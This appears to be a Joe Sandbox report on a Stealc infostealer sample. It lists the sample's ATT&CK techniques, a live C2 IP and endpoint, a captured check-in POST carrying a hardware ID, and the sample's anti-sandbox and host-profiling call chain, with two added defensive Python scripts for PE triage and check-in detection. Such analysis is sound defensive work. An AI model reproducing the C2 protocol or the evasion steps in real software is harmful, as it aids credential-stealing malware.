MITRE ATT&CK Matrix (the 14-column matrix was flattened in extraction; rebuilt here per tactic column. The digits shown in front of a technique are the count markers the report places in that cell, reproduced as extracted; techniques without a count are the matrix's untriggered placeholder cells.)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 2 Command and Scripting Interpreter; 11 Native API; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: 11 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: 1 Masquerading; 33 Virtualization/Sandbox Evasion; 11 Disable or Modify Tools; 11 Process Injection; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 2 System Time Discovery; 641 Security Software Discovery; 33 Virtualization/Sandbox Evasion; 13 Process Discovery; 1 Account Discovery; 1 System Owner/User Discovery; 1 File and Directory Discovery; 324 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: 2 Encrypted Channel; 2 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 12 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Antivirus detections for the sample (Source | Detection | Scanner | Label)
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML |
No Antivirus matches (the three further antivirus tables of the report are empty)

URL detections (Source | Detection | Scanner | Label)
http://185.215.113.37/ | 100% | URL Reputation | malware
http://185.215.113.37 | 100% | URL Reputation | malware
http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware
http://185.215.113.37/ws | 100% | URL Reputation | malware
No contacted domains info

Contacted URLs (Name | Malicious | Antivirus Detection | Reputation)
http://185.215.113.37/ | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown

URLs found in memory strings (Name | Source | Malicious | Antivirus Detection | Reputation; the characters following .php or .37 in some names are part of the string as extracted from memory)
http://185.215.113.37/e2b1563c6670f193.php(# | file.exe, 00000000.00000002.1367632682.00000000012FB000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37 | file.exe, 00000000.00000002.1367632682.000000000129E000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.phpo | file.exe, 00000000.00000002.1367632682.00000000012FB000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/ws | file.exe, 00000000.00000002.1367632682.00000000012FB000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://185.215.113.37w | file.exe, 00000000.00000002.1367632682.000000000129E000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e2b1563c6670f193.phpS | file.exe, 00000000.00000002.1367632682.00000000012FB000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e2b1563c6670f193.phpG | file.exe, 00000000.00000002.1367632682.00000000012FB000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
Contacted IPs (IP | Domain | Country | ASN | ASN Name | Malicious)
185.215.113.37 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1533401
                          Start date and time:2024-10-14 17:17:08 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 5m 11s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:9
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:file.exe
                          Detection:MAL
                          Classification:mal100.troj.evad.winEXE@1/0@0/1
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 80%
                          • Number of executed functions: 19
                          • Number of non-executed functions: 87
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                          • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • VT rate limit hit for: file.exe
                          No simulations
IP context (Match | Associated Sample Name / URL | Detection | Threat Name | Context; the SHA 256 and link columns were links and did not survive extraction)
185.215.113.37 | file.exe, 10 previously analysed samples | malicious | Stealc, Vidar (4 samples); Stealc (6 samples) | 185.215.113.37/e2b1563c6670f193.php
No context

ASN context (Match | Associated Sample Name / URL | Detection | Threat Name | Context)
WHOLESALECONNECTIONSNL | file.exe, 10 previously analysed samples | malicious | Stealc, Vidar (4 samples); Stealc (6 samples) | 185.215.113.37
No context
No context
                          No created / dropped files found
                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):7.947602937319869
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.96%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:file.exe
                          File size:1'847'296 bytes
                          MD5:bf6de6e8d3ac5123b66ba93633affe66
                          SHA1:f5f047a51c8ffe5700542d6ea9517214d4f31725
                          SHA256:eb01ca908e0cad8310d771a3722cad18d9694c718c37ac5f363e476e1c1212de
                          SHA512:5f81468fb04d9345655f76ab1983b9f53ccb3321418902eb652bc899aeb9afb95687447fc78d3a8d44f49eb7503c7df7d9d7e04c384a4164e64f49fed4b3041e
                          SSDEEP:49152:5EQVzI8pSb+ZmlSNePyEYpjzTi0yxTZ1:RBpBZneKTjv
                          TLSH:E1853353BB56306DD6FDE1B30CC076ACDC38026667926B6F3C610554B82F609EB8E6D8
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
                          Icon Hash:00928e8e8686b000
                          Entrypoint:0xa98000
                          Entrypoint Section:.taggant
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                          Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:5
                          OS Version Minor:1
                          File Version Major:5
                          File Version Minor:1
                          Subsystem Version Major:5
                          Subsystem Version Minor:1
                          Import Hash:2eabe9054cad5152567f0699947a2c5b
Instruction (entry point disassembly; consecutive identical instructions are collapsed with a count, the long runs of "add byte ptr [eax], al" being zero bytes decoded as code)
jmp 00007F0B44C9665Ah
femms
sbb al, 00h
add byte ptr [eax], al (x2)
jmp 00007F0B44C98655h
add byte ptr [ecx], al
or al, byte ptr [eax]
add byte ptr [eax], al (x2)
add byte ptr [eax], dl
add byte ptr [eax], al (x3)
add byte ptr [esi], al
or al, byte ptr [eax]
add byte ptr [eax], al (x6)
add byte ptr [ecx], al
or al, byte ptr [eax]
add byte ptr [esi], al
or al, byte ptr [eax]
add byte ptr [eax], al (x60)
add byte ptr [eax], cl
add byte ptr [eax], 00000000h
add byte ptr [eax], al (x2)
adc byte ptr [eax], al
add byte ptr [eax], al (x3)
push es
or al, byte ptr [eax]
add byte ptr [eax], al (x2)
                          Programming Language:
                          • [C++] VS2010 build 30319
                          • [ASM] VS2010 build 30319
                          • [ C ] VS2010 build 30319
                          • [ C ] VS2008 SP1 build 30729
                          • [IMP] VS2008 SP1 build 30729
                          • [LNK] VS2010 build 30319
Data directories (Name | Virtual Address | Virtual Size | Is in Section)
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Sections (Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics)
(empty name) | 0x1000 | 0x25b000 | 0x22800 | 8475d625e3f7c5b43151555c5826c501 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(empty name) | 0x25e000 | 0x29c000 | 0x200 | 28fdc08b1eb4d51e1e52a2b43a10c155 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
jmwhdghu | 0x4fa000 | 0x19d000 | 0x19ce00 | ba098c1c8c6d9c55ec9a6563feb9566c | False | 0.9950985609673024 | data | 7.9544342173463365 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
xkdnzbup | 0x697000 | 0x1000 | 0x400 | cd261ec749ad0438a328e048d81f69a8 | False | 0.7744140625 | data | 6.070382761997643 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x698000 | 0x3000 | 0x2200 | 49ae221218d0f9b38a31d0a6680d7b8a | False | 0.06066176470588235 | DOS executable (COM) | 0.8011941068887273 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Imports (DLL | Import)
kernel32.dll | lstrcpy
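The static findings the report raises on this file (nameless sections, every section except .rsrc and .idata mapped read-write-execute, a 7.95-entropy section named jmwhdghu, a single kernel32!lstrcpy import, and an entry point of 0xa98000 that is image base 0x400000 plus RVA 0x698000, the first byte of .taggant rather than of a code section) are the ones a triage script should reproduce before the sample is ever run. The following is an added example, not code from the report or from the sample: a stdlib-only Python script that parses a PE section table and applies those checks. So that it runs offline it also assembles a minimal, non-loadable PE image in memory with a layout patterned on the table above; the set of "standard" code section names and the 7.0 entropy threshold are assumptions of this example.

```python
import math
import random
import struct
from collections import Counter

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
# Assumed: names a compiler normally gives the section that holds the entry point.
STANDARD_CODE_SECTIONS = {b".text", b"CODE", b".code"}
HIGH_ENTROPY = 7.0  # assumed threshold; packed or encrypted data sits close to 8.0


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte, the measure the report lists per section."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_sections(pe: bytes):
    """Walk MZ header -> PE signature -> COFF header -> optional header -> section table."""
    if len(pe) < 0x40:
        raise ValueError("not a PE image")
    e_lfanew, = struct.unpack_from("<I", pe, 0x3C)
    if pe[:2] != b"MZ" or pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    nsec, = struct.unpack_from("<H", pe, e_lfanew + 6)       # COFF.NumberOfSections
    opt_size, = struct.unpack_from("<H", pe, e_lfanew + 20)  # COFF.SizeOfOptionalHeader
    opt = e_lfanew + 24
    entry_rva, = struct.unpack_from("<I", pe, opt + 16)      # AddressOfEntryPoint
    sections = []
    for i in range(nsec):
        (name, vsize, va, rawsize, rawptr, _, _, _, _, chars) = struct.unpack_from(
            "<8sIIIIIIHHI", pe, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0"), "va": va, "vsize": vsize,
                         "rawsize": rawsize, "chars": chars,
                         "entropy": shannon_entropy(pe[rawptr:rawptr + rawsize])})
    return entry_rva, sections


def triage(pe: bytes) -> list:
    """Return the static findings a packed sample like this one trips."""
    entry_rva, sections = parse_sections(pe)
    findings, entry_section = [], None
    for s in sections:
        label = s["name"].decode("latin-1") or "<unnamed>"
        if s["va"] <= entry_rva < s["va"] + max(s["vsize"], s["rawsize"]):
            entry_section = s
        if not s["name"] or any(b <= 0x20 or b >= 0x7F for b in s["name"]):
            findings.append(f"{label}: section name is empty or contains special chars")
        if s["chars"] & IMAGE_SCN_MEM_EXECUTE and s["chars"] & IMAGE_SCN_MEM_WRITE:
            findings.append(f"{label}: RWX section (writable and executable)")
        if s["entropy"] > HIGH_ENTROPY:
            findings.append(f"{label}: high entropy {s['entropy']:.2f}, likely packed or encrypted")
    if entry_section is None:
        findings.append(f"entry point RVA 0x{entry_rva:x} maps to no section")
    elif entry_section["name"] not in STANDARD_CODE_SECTIONS:
        label = entry_section["name"].decode("latin-1") or "<unnamed>"
        findings.append(f"entry point RVA 0x{entry_rva:x} lies outside standard sections (in {label})")
    return findings


def build_test_pe(sections, entry_rva: int) -> bytes:
    """Assemble a minimal PE32 whose headers are valid for parse_sections() but which
    is not loadable. sections = [(name, virtual address, characteristics, raw data)]."""
    opt_size, raw_base = 224, 0x400
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                               # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)                              # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)                         # AddressOfEntryPoint
    table, blobs = bytearray(), bytearray()
    for name, va, chars, data in sections:
        table += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), len(data), va,
                             len(data), raw_base + len(blobs), 0, 0, 0, 0, chars)
        blobs += data
    image = dos + b"PE\0\0" + coff + opt + table
    if len(image) > raw_base:
        raise ValueError("too many sections for this toy builder")
    return bytes(image + b"\0" * (raw_base - len(image)) + blobs)


def demo() -> list:
    """Constructed image patterned on the report's table: an unnamed RWX section of
    pseudo-random (high-entropy) bytes, a plain .text, and a low-entropy RWX .taggant
    section that holds the entry point."""
    rng = random.Random(2024)
    packed = bytes(rng.getrandbits(8) for _ in range(4096))
    rwx = IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_EXECUTE
    rx = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_EXECUTE
    image = build_test_pe([(b"", 0x1000, rwx, packed),
                           (b".text", 0x3000, rx, b"\xC3" * 512),
                           (b".taggant", 0x4000, rwx, b"\xE9" + b"\0" * 511)],
                          entry_rva=0x4000)
    return triage(image)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Run against a real file, `triage(open(path, "rb").read())` gives the same five classes of finding the report lists for this sample; the builder exists only so the example has input without shipping a malicious binary.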
Suricata IDS alerts (Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol)
2024-10-14T17:18:15.099274+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.7 | 49708 | 185.215.113.37 | 80 | TCP
TCP packets (Timestamp | Source Port | Dest Port | Source IP | Dest IP)
Oct 14, 2024 17:18:14.141050100 CEST | 49708 | 80 | 192.168.2.7 | 185.215.113.37
Oct 14, 2024 17:18:14.145940065 CEST | 80 | 49708 | 185.215.113.37 | 192.168.2.7
Oct 14, 2024 17:18:14.146003962 CEST | 49708 | 80 | 192.168.2.7 | 185.215.113.37
Oct 14, 2024 17:18:14.146800995 CEST | 49708 | 80 | 192.168.2.7 | 185.215.113.37
Oct 14, 2024 17:18:14.151736975 CEST | 80 | 49708 | 185.215.113.37 | 192.168.2.7
Oct 14, 2024 17:18:14.864720106 CEST | 80 | 49708 | 185.215.113.37 | 192.168.2.7
Oct 14, 2024 17:18:14.864778042 CEST | 49708 | 80 | 192.168.2.7 | 185.215.113.37
Oct 14, 2024 17:18:14.867588997 CEST | 49708 | 80 | 192.168.2.7 | 185.215.113.37
Oct 14, 2024 17:18:14.872766018 CEST | 80 | 49708 | 185.215.113.37 | 192.168.2.7
Oct 14, 2024 17:18:15.099164009 CEST | 80 | 49708 | 185.215.113.37 | 192.168.2.7
Oct 14, 2024 17:18:15.099273920 CEST | 49708 | 80 | 192.168.2.7 | 185.215.113.37
Oct 14, 2024 17:18:18.925829887 CEST | 49708 | 80 | 192.168.2.7 | 185.215.113.37

HTTP hosts contacted:
• 185.215.113.37

HTTP sessions (Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process)
0 | 192.168.2.7 | 49708 | 185.215.113.37 | 80 | 7500 | C:\Users\user\Desktop\file.exe
HTTP stream of session 0 (Timestamp | Bytes transferred | Direction, followed by the data; line breaks in the ASCII view restored from the CRLFs in the raw bytes)

Oct 14, 2024 17:18:14.146800995 CEST | 89 | OUT
GET / HTTP/1.1
Host: 185.215.113.37
Connection: Keep-Alive
Cache-Control: no-cache

Oct 14, 2024 17:18:14.864720106 CEST | 203 | IN
HTTP/1.1 200 OK
Date: Mon, 14 Oct 2024 15:18:14 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

Oct 14, 2024 17:18:14.867588997 CEST | 411 | OUT
POST /e2b1563c6670f193.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----JJJDGIECFCAKKFHIIIJE
Host: 185.215.113.37
Content-Length: 210
Connection: Keep-Alive
Cache-Control: no-cache
Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 44 47 49 45 43 46 43 41 4b 4b 46 48 49 49 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 44 35 31 45 33 42 31 30 36 34 41 35 36 33 34 38 34 31 34 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 44 47 49 45 43 46 43 41 4b 4b 46 48 49 49 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 44 47 49 45 43 46 43 41 4b 4b 46 48 49 49 49 4a 45 2d 2d 0d 0a
Data Ascii:
------JJJDGIECFCAKKFHIIIJE
Content-Disposition: form-data; name="hwid"

8D51E3B1064A563484146
------JJJDGIECFCAKKFHIIIJE
Content-Disposition: form-data; name="build"

doma
------JJJDGIECFCAKKFHIIIJE--

Oct 14, 2024 17:18:15.099164009 CEST | 210 | IN
HTTP/1.1 200 OK
Date: Mon, 14 Oct 2024 15:18:14 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 59 6d 78 76 59 32 73 3d
Data Ascii: YmxvY2s= (base64 of the string "block")
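The exchange above is the whole C2 conversation the sandbox captured: a GET / probe answered with an empty 200, then a multipart POST carrying only a hwid and a build tag, answered with an 8-byte base64 body that decodes to "block" (the server's reply to a check-in it declined to serve). The following is an added example, not code from the report, from Joe Sandbox or from the malware: a stdlib-only Python script that takes the POST body from the raw bytes printed above (constructed here from that Data Raw dump), parses the multipart form strictly, decodes the reply, and applies a heuristic of my own to flag the check-in. The heuristic is not the content of Suricata SID 2044243, whose rule body is not on this page; the field names, the hex hwid and the base64 reply are all taken from the capture.

```python
import base64
import binascii
import re

# Constructed input: the POST body and the reply body, byte for byte as the
# HTTP stream's "Data Raw" lines print them.
POST_CONTENT_TYPE = "multipart/form-data; boundary=----JJJDGIECFCAKKFHIIIJE"
POST_BODY = bytes.fromhex(
    "2d 2d 2d 2d 2d 2d 4a 4a 4a 44 47 49 45 43 46 43 41 4b 4b 46 48 49 49 49 4a 45 0d 0a "
    "43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 "
    "6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a "
    "38 44 35 31 45 33 42 31 30 36 34 41 35 36 33 34 38 34 31 34 36 0d 0a "
    "2d 2d 2d 2d 2d 2d 4a 4a 4a 44 47 49 45 43 46 43 41 4b 4b 46 48 49 49 49 4a 45 0d 0a "
    "43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 "
    "6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a "
    "64 6f 6d 61 0d 0a "
    "2d 2d 2d 2d 2d 2d 4a 4a 4a 44 47 49 45 43 46 43 41 4b 4b 46 48 49 49 49 4a 45 2d 2d 0d 0a"
)
REPLY_BODY = bytes.fromhex("59 6d 78 76 59 32 73 3d")

HWID_RE = re.compile(r"[0-9A-F]{16,}")  # assumed shape, generalised from the 21-digit value seen


def parse_multipart_form(body: bytes, content_type: str) -> dict:
    """Parse a multipart/form-data body into {field name: value}.
    Strict about the CRLF framing so a truncated or tampered message raises
    instead of yielding a half-parsed field."""
    m = re.search(r'boundary="?([^";]+)"?', content_type)
    if m is None:
        raise ValueError("Content-Type carries no boundary")
    delimiter = b"--" + m.group(1).encode("ascii")
    chunks = body.split(delimiter)
    if len(chunks) < 2 or not chunks[-1].startswith(b"--"):
        raise ValueError("missing closing delimiter")
    fields = {}
    for chunk in chunks[1:-1]:
        if not chunk.startswith(b"\r\n") or not chunk.endswith(b"\r\n"):
            raise ValueError("part is not CRLF framed")
        headers, sep, value = chunk[2:-2].partition(b"\r\n\r\n")
        if not sep:
            raise ValueError("part has no header/body separator")
        name = None
        for line in headers.split(b"\r\n"):
            if line.lower().startswith(b"content-disposition:"):
                nm = re.search(rb'name="([^"]*)"', line)
                if nm:
                    name = nm.group(1).decode("ascii")
        if name is None:
            raise ValueError("part has no field name")
        fields[name] = value.decode("latin-1")
    return fields


def decode_c2_reply(body: bytes) -> str:
    """The reply is a bare base64 token; reject anything outside the alphabet."""
    try:
        plain = base64.b64decode(body, validate=True)
    except binascii.Error as exc:
        raise ValueError(f"reply is not base64: {body!r}") from exc
    return plain.decode("ascii")


def is_stealc_style_checkin(fields: dict, reply_text: str) -> bool:
    """Heuristic added here: exactly the two fields seen in the capture, an
    uppercase-hex hwid, a short build tag, and a printable decoded reply."""
    return (set(fields) == {"hwid", "build"}
            and HWID_RE.fullmatch(fields["hwid"]) is not None
            and 0 < len(fields["build"]) <= 32
            and reply_text.isprintable())


def triage_capture():
    """Run the three steps over the constructed capture."""
    fields = parse_multipart_form(POST_BODY, POST_CONTENT_TYPE)
    reply = decode_c2_reply(REPLY_BODY)
    return fields, reply, is_stealc_style_checkin(fields, reply)


if __name__ == "__main__":
    fields, reply, hit = triage_capture()
    print(fields, reply, hit)
```

The strictness in `parse_multipart_form` is deliberate: a detector that tolerates a missing closing delimiter or LF-only framing will also accept a body the operator has padded to dodge it, so the parser refuses what the malware would never send.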



                          Target ID:0
                          Start time:11:18:08
                          Start date:14/10/2024
                          Path:C:\Users\user\Desktop\file.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\file.exe"
                          Imagebase:0x670000
                          File size:1'847'296 bytes
                          MD5 hash:BF6DE6E8D3AC5123B66BA93633AFFE66
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1367632682.000000000129E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1325704313.0000000004F30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true


                            Execution Graph

                            Execution Coverage:7.8%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:9.7%
                            Total number of Nodes:2000
                            Total number of Limit Nodes:24
execution_graph (node export of the interactive graph, rebuilt here as the call chain it encodes; node addresses and API names are as exported, and the export is cut off after node 685e9e)

Unpacking and import resolution:
6869f0 -> 672260 -> 6745c0 (a run of 43 consecutive calls, "2 API calls" each) -> 689860 -> 689750 GetPEB -> 68987a -> 68988c (21 API calls) -> 689a93 LoadLibraryA x5 -> GetProcAddress at 689af4, 689b16 (x2), 689b4f, 689b71, 689b92 (x2) -> 686a00 -> 68a740 -> 68a77e lstrcpy -> 6711d0

Environment checks, each with its own ExitProcess edge:
6711d0 -> 6711e8 -> 67120f ExitProcess, or 671217 -> 671160 GetSystemInfo -> 67117c ExitProcess, or 671184 -> 671110 GetCurrentProcess, VirtualAllocExNuma -> 671141 ExitProcess, or 671149 -> 6710a0 VirtualAlloc -> 671220 -> 6889b0 -> 671249 __aulldiv -> 671292 ExitProcess, or 67129a -> 686770 GetUserDefaultLangID -> 686792 -> ExitProcess at 6867a3, 6867ad, 6867b7, 6867c1 or 6867cb, or 6867d3 -> 671190 -> 6878e0 (3 API calls) -> 67119e -> 687850 (3 API calls) -> 6711b7 -> 6711c4 ExitProcess, or 6711cc

User name, host name and single-instance event:
6711cc -> 687850 GetProcessHeap, RtlAllocateHeap, GetUserNameA -> 686a30 -> 6878e0 GetProcessHeap, RtlAllocateHeap, GetComputerNameA -> 686a43 -> 68a9b0 (68a710, lstrlen, lstrcpy, lstrcat, 68a7a0) -> 686a64 -> 68a9b0 -> 686a6b -> 68a9b0 -> 686a72 -> 68a9b0 -> 686a79 -> 68a9b0 -> 686a80 -> 68a8a0 lstrcpy -> 686a89 -> 686ac2 OpenEventA -> either 686af5 CloseHandle, Sleep -> 686b0a -> back to 686a89, or 686ad9 -> 686ae1 CreateEventA -> 686b0c

Date check, then collection:
